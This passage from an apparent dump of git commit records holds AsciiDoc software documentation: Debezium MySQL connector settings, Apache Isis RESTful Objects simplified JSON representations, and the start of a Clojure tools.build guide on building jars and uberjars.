+\nThe topic is named according to the pattern `<heartbeat.topics.prefix>.<server.name>`.\n\n|`database.initial.statements` +\n0.8.0 and later\n|\n|A semicolon-separated list of SQL statements to be executed when a JDBC connection (not the transaction log reading connection) to the database is established.\nUse a doubled semicolon (';;') to use a semicolon as a character and not as a delimiter. +\n_Note: The connector may establish JDBC connections at its own discretion, so this should typically be used for configuration of session parameters only, but not for executing DML statements._\n\n|`snapshot.delay.ms` +\n0.8.0 and later\n|\n|An interval in milliseconds that the connector should wait before taking a snapshot after starting up. +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|`snapshot.fetch.size` +\n0.9.5 and later\n|\n|Specifies the maximum number of rows that should be read in one go from each table while taking a snapshot.\nThe connector will read the table contents in multiple batches of this size.\n\n|`enable.time.adjuster` +\n0.9.3 and later\n|\n|MySQL allows users to insert year values with either 2 or 4 digits.\nA 2-digit value is automatically mapped to the 1970 - 2069 range.\nThis mapping is usually done by the database. +\nSet to `true` (the default) when Debezium should do the conversion. +\nSet to `false` when conversion is fully delegated to the database.\n|=======================\n\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer. Specifically, all connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history, and all those that begin with the prefix `database.history.consumer.` are used (without the prefix) when creating the Kafka consumer that reads the database history upon connector startup.\n\nFor example, the following connector configuration properties can be used to http:\/\/kafka.apache.org\/documentation.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nIn addition to the _pass-through_ to the Kafka producer and consumer, the properties starting with `database.`, e.g. `database.tinyInt1isBit=false`, are passed to the JDBC URL.\n\nBe sure to consult the http:\/\/kafka.apache.org\/documentation.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. 
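Continuing the example above, the `database.` pass-through can be illustrated with a minimal sketch (`tinyInt1isBit` is the property named in the text above; `connectTimeout` is assumed here purely for illustration and is not taken from this document):\n\n[source,indent=0]\n----\ndatabase.tinyInt1isBit=false\ndatabase.connectTimeout=30000\n----\n\nNote that this `database.` pass-through affects only the JDBC connection, not the Kafka producer and consumer. 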
(The MySQL connector does use the http:\/\/kafka.apache.org\/documentation.html#newconsumerconfigs[new consumer].)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8817ac990e5602c157354c72193be5b5cb7543e6","subject":"ISIS-1243: more updates to RO viewer docs","message":"ISIS-1243: more updates to RO viewer docs\n","repos":"apache\/isis,oscarbou\/isis,niv0\/isis,sanderginn\/isis,niv0\/isis,apache\/isis,estatio\/isis,estatio\/isis,sanderginn\/isis,apache\/isis,oscarbou\/isis,sanderginn\/isis,apache\/isis,incodehq\/isis,sanderginn\/isis,oscarbou\/isis,incodehq\/isis,estatio\/isis,incodehq\/isis,niv0\/isis,niv0\/isis,apache\/isis,estatio\/isis,apache\/isis,incodehq\/isis,oscarbou\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_ugvro_simplified-representations.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_ugvro_simplified-representations.adoc","new_contents":"[[_ugvro_simplified-representations]]\n= Simplified Representations\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:_basedir: ..\/\n:_imagesdir: images\/\n\n\n\nThe representations defined by the RO spec are very rich and enable complex client-side applications to be built.\nHowever, their sophistication can be an impediment to their use if one wishes to write a simple app using third-party\ncomponents that expect to consume much simpler representations. Examples of such tools are\nlink:http:\/\/angular-ui.github.io\/bootstrap\/[Angular Bootstrap],\nlink:http:\/\/vitalets.github.io\/angular-xeditable\/[Angular XEditable],\nlink:https:\/\/github.com\/mgcrea\/angular-strap[Angular Strap].\n\n\nAs of `1.11.0-SNAPSHOT`, Apache Isis provides support for its own simplified representation for the most commonly-used\nrepresentations. This is implemented using the `ContentNegotiationService` described in the\nxref:ugvro.adoc#_ugvro_architecture[architecture] chapter.\n\n\n\n[[_ugvro_simplified-representations_apache-isis-profile]]\n== The Apache Isis \"Profile\"\n\nThe RO spec uses the standard `Accept` header for content negotiation, and defines its own \"profile\" for the standard\nrepresentations; these take the form:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.restfulobjects:repr-types\/xxx\"\n----\n\nwhere \"xxx\" varies by resource. The detail can be found in section 2.4.1 of the RO spec.\n\nThe Apache Isis viewer also defines its own \"Isis\" profile which enables the client to request simplified\nrepresentations for the most frequently accessed resources. This is done by specifying an `Accept` header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nNot every resource supports this header, but the most commonly accessed ones do. 
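For example (a sketch that reuses the todoapp resource and the `Accept` header shown in the examples later in this section), a request opting into this profile might look like:\n\n[source]\n----\nGET \/restful\/objects\/TODO\/45 HTTP\/1.1\nHost: localhost:8080\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\n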
In each case the server will set the\n`Content-Type` header so that the client knows how to process the representation.\n\nThe screencast below demonstrates the feature.\n\nvideo::HMSqapQDY_4[youtube,width=\"853px\",height=\"480px\"]\n\n\nThe sections below explain in a little more detail what is returned when this profile is activated.\n\n\n[[_ugvro_simplified-representations_domain-object]]\n== Domain Object\n\nIf a domain object resource (section 14) is accessed with the Apache Isis profile, the resultant representation is a\nJSON object with simple key\/value pairs for each property.\n\nThe contents of any collections are also eagerly returned, consisting of an array of elements of each referenced\nobject. Each such element contains key\/value pairs of each property (in other words, a grid of data is returned).\nEach element also has a special `$$href` property (so that the client can easily navigate to a resource for that\nobject) and a `$$title` property (to use as a label, eg the hyperlink text).\n\nIn addition, the representation defined by the RO spec is also included, under a special `$$ro` property.\n\nFor example, using the (non-ASF) http:\/\/github.com\/isisaddons\/isis-app-todoapp[Isis addons' todoapp], accessing\nthis resource:\n\n[source]\n----\nhttp:\/\/localhost:8080\/restful\/objects\/TODO\/45\n----\n\nwith an `Accept` request header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nreturns the following representation:\n\n[source]\n----\n{\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/45\", \/\/ <1>\n \"$$title\" : \"Buy bread due by 2015-12-04\", \/\/ <2>\n \"description\" : \"Buy bread\", \/\/ <3>\n \"category\" : \"Domestic\",\n \"subcategory\" : \"Shopping\",\n \"complete\" : false,\n \"atPath\" : \"\/users\/sven\",\n ...\n \"similarTo\" : [ { \/\/ <4>\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/46\",\n \"$$title\" : \"Buy milk due by 2015-12-04\",\n \"description\" : \"Buy milk\",\n \"category\" : \"Domestic\",\n ...\n }, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/47\",\n \"$$title\" : \"Buy stamps due by 2015-12-04\",\n \"description\" : \"Buy stamps\",\n \"category\" : \"Domestic\",\n ...\n },\n ...\n } ],\n \"dependencies\" : [ ],\n \"$$ro\" : { \/\/ <5>\n \"links\" : [ ... ],\n \"extensions\" : { ... },\n \"title\" : \"Buy bread due by 2015-12-04\",\n \"domainType\" : \"TODO\",\n \"instanceId\" : \"45\",\n \"members\" : { ... }\n }\n}\n----\n<1> hyperlink to the representation\n<2> title of the domain object\n<3> all the properties of the domain object (to which the caller has access), as key\/value pairs\n<4> contents of each collection\n<5> special `$$ro` json-prop, being the normal RO Spec representation for this object\n\nwith a `Content-Type` header:\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"object\"\n----\n\n\n[[_ugvro_simplified-representations_object-collection]]\n== Domain Object Collection\n\nIf a domain object collection (section 17) is accessed with this profile, then the resultant representation is\nan array of elements, one for each referenced object, with each element again containing the key\/value\npairs of the properties of that object (a grid, again). 
+\n\nIn addition, the representation defined by the RO spec is also included, as a special object with a single `$$ro`\nproperty.\n\nFor example, using the (non-ASF) http:\/\/github.com\/isisaddons\/isis-app-todoapp[Isis addons' todoapp], accessing\nthis resource:\n\n[source]\n----\nhttp:\/\/localhost:8080\/restful\/objects\/TODO\/45\/collections\/similarTo\n----\n\nwith an `Accept` request header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nreturns the following representation:\n\n[source]\n----\n[ \/\/ <1>\n{\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/46\", \/\/ <2>\n \"$$title\" : \"Buy milk due by 2015-12-04\", \/\/ <3>\n \"description\" : \"Buy milk\", \/\/ <4>\n \"category\" : \"Domestic\",\n ...\n}, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/47\",\n \"$$title\" : \"Buy stamps due by 2015-12-04\",\n \"description\" : \"Buy stamps\",\n \"category\" : \"Domestic\",\n ...\n}, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/48\",\n \"$$title\" : \"Mow lawn due by 2015-12-10\",\n \"description\" : \"Mow lawn\",\n \"category\" : \"Domestic\",\n ...\n},\n...\n, {\n \"$$ro\" : { \/\/ <5>\n \"id\" : \"similarTo\",\n \"memberType\" : \"collection\",\n \"links\" : [ ... ],\n \"extensions\" : { ... },\n \"value\" : [ ... ]\n }\n}\n]\n----\n<1> returns a JSON array, not a JSON object\n<2> hyperlink to the representation\n<3> title of the domain object\n<4> all the properties of the domain object (to which the caller has access), as key\/value pairs\n<5> last element is a special object with a single `$$ro` json-prop, being the normal RO Spec representation for this object\n\nwith a `Content-Type` header:\n\n[source]\n----\nContent-Type: application\/json;profile=\"urn:org.apache.isis\/v1\";repr-type=\"object-collection\"\n----\n\n\n[[_ugvro_simplified-representations_action-invocation]]\n== Action Invocation\n\nWhen an action is invoked, it can return a domain object, a list, a scalar, or return nothing.\n\n=== Returning an Object\n\nIf the action returned an object, then the domain object representation described\nxref:ugvro.adoc#_ugvro_simplified-representations_domain-object[above] is returned.\n\nFor example, using the (non-ASF) http:\/\/github.com\/isisaddons\/isis-app-todoapp[Isis addons' todoapp], accessing\nthis resource:\n\n[source]\n----\nhttp:\/\/localhost:8080\/restful\/objects\/TODO\/45\/actions\/updateCost\/invoke\n----\n\nwith an `Accept` request header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nreturns the following representation:\n\n[source]\n----\n\n{\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/45\",\n \"$$title\" : \"Buy bread due by 2015-12-04\",\n \"description\" : \"Buy bread\",\n \"category\" : \"Domestic\",\n \"subcategory\" : \"Shopping\",\n \"complete\" : false,\n ...\n \"similarTo\" : [ ... ]\n ...\n \"$$ro\" : { ... }\n}\n----\n\nwith a `Content-Type` of:\n\n[source]\n----\nContent-Type: application\/json;profile=\"urn:org.apache.isis\/v1\";repr-type=\"object\"\n----\n\n\\... 
in other words, no different from a representation obtained from the returned domain object directly.\n\n\n=== Returning a List\n\nOn the other hand, if the action returned a list (a \"standalone\" collection), then an array representation is returned.\nThis is very similar to that returned by a\nxref:ugvro.adoc#_ugvro_simplified-representations_object-collection[(parented) object collection], though with a\nslightly different `Content-Type` to distinguish.\n\nFor example, using the (non-ASF) http:\/\/github.com\/isisaddons\/isis-app-todoapp[Isis addons' todoapp], accessing\nthis resource:\n\n[source]\n----\nhttp:\/\/localhost:8080\/restful\/services\/ToDoItems\/actions\/notYetComplete\/invoke\n----\n\nwith an `Accept` request header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nreturns the following representation:\n\n[source]\n----\n[ {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/45\",\n \"$$title\" : \"Buy bread due by 2015-12-04\",\n \"description\" : \"Buy bread\",\n \"category\" : \"Domestic\",\n ...\n}, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/46\",\n \"$$title\" : \"Buy milk due by 2015-12-04\",\n \"description\" : \"Buy milk\",\n \"category\" : \"Domestic\",\n ...\n}, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/48\",\n \"$$title\" : \"Mow lawn due by 2015-12-10\",\n \"description\" : \"Mow lawn\",\n \"category\" : \"Domestic\",\n ...\n},\n...\n, {\n \"$$ro\" : {\n \"links\" : [ ... ]\n \"resulttype\" : \"list\",\n \"result\" : { ... }\n \"value\" : [ ... ],\n \"links\" : [ ... ],\n \"extensions\" : { }\n }\n }\n} ]\n----\n\nwith a `Content-Type` header:\n\n[source]\n----\nContent-Type: application\/json;profile=\"urn:org.apache.isis\/v1\";repr-type=\"list\"\n----\n\n=== Returning Scalar\/Nothing\n\nNote that actions returning scalar values or nothing (which includes `void` actions) are not supported; for these the\nregular RO spec representation will be returned.\n\n\n[[_ugvro_simplified-representations_other-representations]]\n== Supporting other Representations\n\nSometimes though you may want to extend or change the representations generated. This might be because you want to\nwrite a RESTful client that uses a particular library (say a Javascript library or web components) that can only handle representations in a certain form.\n\nOr, you might want to have Apache Isis generate representations according to some other \"standard\", of which there are\nmany:\n\n* Mike Kelly's http:\/\/stateless.co\/hal_specification.html[HAL] specification\n* Mike Amundsen's http:\/\/amundsen.com\/media-types\/collection\/[Collection+JSON] specification\n* Kevin Swiber's https:\/\/github.com\/kevinswiber\/siren[Siren] specification\n* Steve Klabnik's http:\/\/jsonapi.org\/[JSON API] specification\n* Gregg Cainus' https:\/\/github.com\/cainus\/hyper-json-spec[Hyper+JSON] specification\n* the W3C's https:\/\/www.w3.org\/TR\/json-ld\/[JSON-LD] specification\n* Markus Lanthaler's http:\/\/www.markus-lanthaler.com\/hydra\/[Hydra] specification.\n\nA good discussion about the relative merits of several of these different hypermedia formats can be found https:\/\/groups.google.com\/forum\/#!msg\/api-craft\/NgjzQYVOE4s\/EAB2jxtU_TMJ[here].\n\nOr, of course, you may have your own internal specification that you wish to use.\n\nSupporting any of these alternative representations can be achieved by providing a suitable implementation of\n`ContentNegotiationService`. 
The existing implementations (eg `ContentNegotiationServiceSimplified`) can be used as a\nstarting point.\n\n[NOTE]\n====\nThese will, admittedly, need to access the internal APIs for the Apache Isis metamodel, and you should be aware that\nthese are not formal API; they may change over time. That said, they are very stable and have not changed\nsignificantly over the last few years.\n====\n\n\n\ninclude::_ugvro_simplified-representations_configuration-properties.adoc[leveloffset=+1]\n\n\n","old_contents":"[[_ugvro_simplified-representations]]\n= Simplified Representations\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:_basedir: ..\/\n:_imagesdir: images\/\n\n\n\nThe representations defined by the RO spec are very rich and enable complex client-side applications to be built.\nHowever, their sophistication can be an impediment to their use if one wishes to write a simple app using third-party\ncomponents that expect to consume much simpler representations. Examples of such tools are\nlink:http:\/\/angular-ui.github.io\/bootstrap\/[Angular Bootstrap],\nlink:http:\/\/vitalets.github.io\/angular-xeditable\/[Angular XEditable],\nlink:https:\/\/github.com\/mgcrea\/angular-strap[Angular Strap].\n\n\nAs of `1.11.0-SNAPSHOT`, Apache Isis provides support for its own simplified representation for the most commonly-used\nrepresentations. This is implemented using the `ContentNegotiationService` described in the\nxref:ugvro.adoc#_ugvro_architecture[architecture] chapter.\n\n\n\n[[_ugvro_simplified-representations_apache-isis-profile]]\n== The Apache Isis \"Profile\"\n\nThe RO spec uses the standard `Accept` header for content negotiation, and defines its own \"profile\" for the standard\nrepresentations; these take the form:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.restfulobjects:repr-types\/xxx\"\n----\n\nwhere \"xxx\" varies by resource. The detail can be found in section 2.4.1 of the RO spec.\n\nThe Apache Isis viewer also defines its own \"Isis\" profile which enables the client to request simplified\nrepresentations for the most frequently accessed resources. This is done by specifying an `Accept` header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nNot every resource supports this header, but the most commonly accessed ones do. 
In each case the server will set the\n`Content-Type` header so that the client knows how to process the representation.\n\nThe screencast below demonstrates the feature.\n\nvideo::HMSqapQDY_4[youtube,width=\"853px\",height=\"480px\"]\n\n\nAnd the table below explains in a little more detail what is returned when this profile is activated.\n\n[cols=\"1a,4a\", options=\"header\"]\n|===\n\n| Resource\n| Description\n\n\n|Domain object +\n(section 14)\n|The representation of a domain object is simple key\/value pairs for each property. The contents of any collections are\nalso eagerly returned, consisting of an array of elements of each referenced object. Each such element contains\nkey\/value pairs of each property (in other words, a grid of data is returned), along with special `$$href` and\n`$$title` properties. +\n\nIn addition, the representation defined by the RO spec is also included, under a special `$$ro` property. +\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"object\"\n----\n\n|Object Collection +\n(section 17)\n|Collections are represented as an array of elements of key\/value for each referenced object, and again each element\nthe containing the key\/value pairs of the properties of that object (a grid, again). +\n\nIn addition, the representation defined by the RO spec is also included, as a special object with a single `$$ro`\nproperty. +\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"object-collection\"\n----\n\n|Action invocation +\n(section 19)\n|If the action returned an object, then the domain object representation described above is returned. +\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"object\"\n----\n\nIf the action returned a list, then the same array representation as (parented) object collections is returned, though\nwith a slightly different `Content-Type` to distinguish:\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"list\"\n----\n\nNote that actions returning scalar values or void are not supported; for these the regular RO spec representation will\nbe returned.\n\n|===\n\n\n\n\n[[_ugvro_simplified-representations_other-representations]]\n== Supporting other Representations\n\nSometimes though you may want to extend or change the representations generated. 
This might be because you want to\nwrite a RESTful client that uses a particular library (say a Javascript library or web components) that can only handle representations in a certain form.\n\nOr, you might want to have Apache Isis generate representations according to some other \"standard\", of which there are\nmany:\n\n* Mike Kelly's http:\/\/stateless.co\/hal_specification.html[HAL] specification\n* Mike Amundsen's http:\/\/amundsen.com\/media-types\/collection\/[Collection+JSON] specification\n* Kevin Swiber's https:\/\/github.com\/kevinswiber\/siren[Siren] specification\n* Steve Klabnik's http:\/\/jsonapi.org\/[JSON API] specification\n* Gregg Cainus' https:\/\/github.com\/cainus\/hyper-json-spec[Hyper+JSON] specification\n* the W3C's https:\/\/www.w3.org\/TR\/json-ld\/[JSON-LD] specification\n* Markus Lanthaler's http:\/\/www.markus-lanthaler.com\/hydra\/[Hydra] specification.\n\nA good discussion about the relative merits of several of these different hypermedia formats can be found https:\/\/groups.google.com\/forum\/#!msg\/api-craft\/NgjzQYVOE4s\/EAB2jxtU_TMJ[here].\n\nOr, of course, you may have your own internal specification that you wish to use.\n\nSupporting any of these alternative representations can be achieved by providing a suitable implementation of\n`ContentNegotiationService`. The existing implementations (eg `ContentNegotiationServiceSimplified`) can be used as a\nstarting point.\n\n[NOTE]\n====\nThese will, admittedly, need to access the internal APIs for the Apache Isis metamodel, and you should be aware that\nthese are not formal API; they may change over time. That said, they are very stable and have not changed\nsignificantly over the last few years.\n====\n\n\n\ninclude::_ugvro_simplified-representations_configuration-properties.adoc[leveloffset=+1]\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0001267daa37b0affd19f4bc25f2621541aa9e7a","subject":"update to latest tags in tools.build","message":"update to latest tags in tools.build\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/tools_build.adoc","new_file":"content\/guides\/tools_build.adoc","new_contents":"= tools.build Guide\nAlex Miller\n2021-06-22\n:type: guides\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nhttps:\/\/github.com\/clojure\/tools.build[tools.build] is a library of functions for building Clojure projects. It is intended to be used in a build program to create user-invokable target functions. Also see the https:\/\/clojure.github.io\/tools.build[API docs].\n\n== Builds are programs\n\nThe philosophy behind tools.build is that your project build is inherently a program - a series of instructions to create one or more project artifacts from your project source files. We want to write this program with our favorite programming language, Clojure, and tools.build is a library of functions commonly needed for builds that can be connected together in flexible ways. Writing a build program does take a bit more code than other declarative approaches, but can be easily extended or customized far into the future, creating a build that grows with your project.\n\n== Setup\n\nThere is no installation step - tools.build is simply a library that your build program uses. You will create an alias in your `deps.edn` that includes tools.build as a dependency and a source path to the build program. Builds are designed to be easily executed as a project \"tool\" in the Clojure CLI (with -T). 
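For example, once the `:build` alias shown below is in place, a build function is invoked like so (the `jar` function used here is the one defined later in this guide):\n\n[source,shell]\n----\nclj -T:build jar\n----\n\n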
In the Clojure CLI, \"tools\" are programs that provide functionality and do not use your project deps or classpath. Tools executed with `-T:an-alias` remove all project deps and paths, add `\".\"` as a path, and include any other deps or paths as defined in `:an-alias`.\n\nAs such, you will need an alias in your deps.edn that defines the build classpath and includes the path to your build source, for example:\n\n[source,clojure]\n----\n{:paths [\"src\"] ;; project paths\n :deps {} ;; project deps\n\n :aliases\n {;; Run with clj -T:build function-in-build\n :build {:deps {io.github.clojure\/tools.build {:git\/tag \"TAG\" :git\/sha \"SHA\"}}\n :ns-default build}}}\n----\n\nFind the most recent TAG and SHA to use at https:\/\/github.com\/clojure\/tools.build#release-information.\n\n[NOTE]\n====\nThe git dep and Clojure CLI examples in this guide assume the use of Clojure CLI 1.10.3.933 or higher.\n====\n\nAs mentioned above, running a tool with -T will create a classpath that does not include the project :paths and :deps. Using `-T:build` will use only the `:paths` and `:deps` from the `:build` alias. The root deps.edn is still included, which will pull in Clojure as well (but it would also come in as a dependency of tools.build). The `:paths` are not specified here, so no additional paths are added, however, `-T` includes the project root `\".\"` as a path by default.\n\nSo executing `clj -T:build jar` will use an effective classpath here of:\n\n* `\".\"` (added by -T)\n* org.clojure\/clojure (from the root deps.edn `:deps`) and transitive deps\n* org.clojure\/tools.build (from the `:build` alias `:deps`) and transitive deps\n\nThe `:ns-default` specifies the default Clojure namespace to find the function specified on the classpath. Because the only local path is the default `\".\"`, we should expect to find the build program at `build.clj` in the root of our project. Note that the path roots (via the `:build` alias `:paths`) and the namespace of the build program itself relative to those paths roots are fully under your control. You may wish to put them in a subdirectory of your project too.\n\nAnd then finally, on the command line we specify the function to run in the build, here `jar`. That function will be executed in the `build` namespace, and passed a map built using the same arg passing style as `-X` - args are provided as alternating keys and values.\n\nThe remainder of this guide demonstrates individual common use cases and how to satisfy them with tools.build programs.\n\n== Source library jar build\n\nThe most common Clojure build creates a jar file containing Clojure source code. 
To do this with tools.build we'll use the following tasks:\n\n* `create-basis` - to create a project basis\n* `copy-dir` - to copy Clojure source and resources into a working dir\n* `write-pom` - to write a pom file in the working dir\n* `jar` - to jar up the working dir into a jar file\n\nThe build.clj will look like this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn jar [_]\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file}))\n----\n\nSome things to notice:\n\n* This is just normal Clojure code - you can load this namespace in your editor and develop it interactively at the REPL.\n* As a single-purpose program, it's fine to build shared data in the set of vars at the top.\n* We are choosing to build in the \"target\" directory and assemble the jar contents in \"target\/classes\" but there is nothing special about these paths - it is fully in your control. Also, we've repeated those paths and others in multiple places here but you can remove that duplication to the extent that feels right.\n* We've used the tools.build task functions to assemble larger functions like `build\/jar` for the user to invoke. These functions take a parameter map and we've chosen not to provide any configurable parameters here, but you could!\n\nThe deps.edn file will look like this:\n\n[source,clojure]\n----\n{:paths [\"src\"]\n :aliases\n {:build {:deps {io.github.clojure\/tools.build {:git\/tag \"TAG\" :git\/sha \"SHA\"}}\n :ns-default build}}}\n----\n\nAnd then you can run this build with:\n\n[source,shell]\n----\nclj -T:build clean\nclj -T:build jar\n----\n\nWe expect to be able to do these both together on the command line but that is a work in progress.\n\n== Compiled uberjar application build\n\nWhen preparing an application, it is common to compile the full app + libs and assemble the entire thing as a single uberjar.\n\nIt is important that your main Clojure namespace should have `(:gen-class)`, for example:\n\n[source,clojure]\n----\n(ns my.lib.main\n ;; any :require and\/or :import clauses\n (:gen-class))\n----\n\nAnd that namespace should have a function like:\n\n[source,clojure]\n----\n(defn -main [& args]\n (do-stuff))\n----\n\nAn example build for a compiled uberjar will look like this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def uber-file (format \"target\/%s-%s-standalone.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn uber [_]\n (clean nil)\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/compile-clj {:basis basis\n :src-dirs [\"src\"]\n :class-dir class-dir})\n (b\/uber {:class-dir class-dir\n :uber-file uber-file\n :basis basis\n :main 'my.lib.main}))\n----\n\nThe deps.edn and build execution will look the same as the prior example.\n\nYou can create the uber jar build 
with:\n\n[source]\n----\nclj -T:build uber\n----\n\nThe output of this build will be an uberjar at `target\/lib1-1.2.100-standalone.jar`. That jar contains both a compiled version of this project and all of its dependencies. The uberjar will have a manifest referring to the `my.lib.main` namespace (which should have a `-main` method) and can be invoked like this:\n\n[source]\n----\njava -jar target\/lib1-1.2.100-standalone.jar\n----\n\n== Parameterized builds\n\nIn the builds above we did not parameterize any aspect of the build, just chose which functions to call. You may find that it's useful to parameterize your builds to differentiate dev\/qa\/prod, or version, or some other factor. To account for function chaining at the command line, it is advisable to establish the common set of parameters to use across your build functions and have each function pass the parameters along.\n\nFor example, consider a parameterization that includes an extra set of dev resources to set a local developer environment. We'll use a simple `:env :dev` kv pair to indicate this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n(def copy-srcs [\"src\" \"resources\"])\n\n(defn clean [params]\n (b\/delete {:path \"target\"})\n params)\n\n(defn jar [{:keys [env] :as params}]\n (let [srcs (if (= env :dev) (cons \"dev-resources\" copy-srcs) copy-srcs)]\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs srcs\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file})\n params))\n----\n\nThe other aspects of deps.edn and invocation remain the same. \n\nInvocation that activates :dev environment will look like this:\n\n[source,shell]\n----\nclj -T:build jar :env :dev\n----\n\nThe kv params are passed to the `jar` function.\n\n== Mixed Java \/ Clojure build\n\nA common case that occurs is needing to introduce a Java implementation class or two into a mostly Clojure project. In this case, you need to compile the Java classes and include them with your Clojure source. 
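For instance, the Java side of such a project might be nothing more than a small helper class like the following (a hypothetical sketch; the package, class, and method names are assumptions rather than part of this guide):\n\n[source,java]\n----\npackage my.lib;\n\n\/\/ A tiny Java helper that the javac task in the build program below compiles alongside the Clojure sources.\npublic class Impl {\n    public static String greet(String name) {\n        return \"Hello, \" + name;\n    }\n}\n----\n\n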
